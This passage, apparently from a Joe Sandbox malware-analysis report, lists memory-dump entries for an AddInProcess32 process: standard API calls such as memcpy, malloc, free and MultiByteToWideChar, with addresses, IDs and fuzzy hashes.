                                            • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: free$memcpy$mallocstrlen
                                            • String ID:
                                            • API String ID: 3669619086-0
                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                            • malloc.MSVCRT ref: 00417407
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                            • free.MSVCRT ref: 00417425
                                            Memory Dump Source
                                            • Source File: 00000015.00000002.2400988614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_21_2_400000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$freemalloc
                                            • String ID:
                                            • API String ID: 2605342592-0
                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5